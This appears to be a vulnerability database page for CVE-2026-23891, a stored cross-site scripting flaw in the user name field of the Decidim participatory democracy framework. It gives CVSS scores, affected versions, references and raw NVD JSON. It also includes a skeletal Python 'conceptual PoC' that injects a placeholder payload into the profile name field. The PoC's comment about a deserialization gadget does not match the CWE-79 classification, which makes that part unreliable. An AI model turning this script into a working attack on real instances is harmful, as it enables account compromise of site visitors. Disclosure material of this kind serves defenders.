CVE-2026-23891

Description

Decidim is a participatory democracy framework. In versions below 0.30.5 and 0.31.0.rc1 through 0.31.0, a stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries. This issue has been fixed in versions 0.30.5 and 0.31.1.

CVSS Details

CVSS Score

8.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:decidim:decidim:*:*:*:*:*:ruby:*:* - VULNERABLE

Decidim < 0.30.5

Decidim 0.31.0.rc1 - 0.31.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC for CVE-2026-23891 # This script demonstrates how an attacker might send a malicious payload to the user name field. import requests target_url = "http://target-decidim-instance.com" session = requests.Session() # 1. Attacker logs in login_data = { "user[email]": "[email protected]", "user[password]": "password" } session.post(f"{target_url}/users/sign_in", data=login_data) # 2. Attacker updates profile with malicious payload in the name field # Payload represents a code execution exploit (e.g., deserialization gadget) malicious_payload = "<malicious_code_execution_payload>" update_data = { "user[name]": malicious_payload, # ... other required fields } response = session.post(f"{target_url}/profile", data=update_data) if response.status_code == 200: print("[+] Payload injected successfully via user name field.") print("[+] Trigger execution by visiting a comment page.") else: print("[-] Injection failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23891
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23891
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23891/
[4] VulDB https://vuldb.com/cve/CVE-2026-23891
[5] https://github.com/decidim/decidim/releases/tag/v0.30.5
[6] https://github.com/decidim/decidim/releases/tag/v0.31.1
[7] https://github.com/decidim/decidim/security/advisories/GHSA-fc46-r95f-hq7g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23891", "sourceIdentifier": "[email protected]", "published": "2026-04-13T17:16:28.063", "lastModified": "2026-04-22T16:40:25.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Decidim is a participatory democracy framework. In versions below 0.30.5 and 0.31.0.rc1 through 0.31.0, a stored code execution vulnerability in the user name field allows a low-privileged attacker to execute arbitrary code in the context of any user who passively visits a comment page, resulting in high confidentiality and integrity impact across security boundaries. This issue has been fixed in versions 0.30.5 and 0.31.1."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:decidim:decidim:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.30.5", "matchCriteriaId": "0EDD53FD-D485-451E-8F3A-121EF31AA587"}, {"vulnerable": true, "criteria": "cpe:2.3:a:decidim:decidim:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.31.0", "versionEndExcluding": "0.31.1", "matchCriteriaId": "029260FC-BDC7-4FFF-B8DA-B7BF1BF978EC"}]}]}], "references": [{"url": "https://github.com/decidim/decidim/releases/tag/v0.30.5", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/decidim/decidim/releases/tag/v0.31.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/decidim/decidim/security/advisories/GHSA-fc46-r95f-hq7g", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}